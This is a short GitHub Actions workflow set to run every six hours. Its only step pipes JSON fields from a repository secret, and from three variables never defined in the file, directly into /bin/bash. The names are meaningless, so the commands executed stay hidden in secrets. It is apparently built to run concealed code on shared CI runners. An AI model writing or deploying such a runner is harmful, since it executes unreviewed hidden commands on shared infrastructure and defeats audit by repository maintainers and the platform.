name: dengfei19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '46 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dengfei19871010
        env:
          avhn1957: ${{ secrets.avhn1957 }}
        run: |
          echo $avhn1957 | jq -r .fwj40 | /bin/bash
          echo $movzr185 | jq -r .v12 | /bin/bash
          echo $o580 | jq -r .lbar3 | /bin/bash
          echo $kxojx53 | jq -r .zg4 | /bin/bash

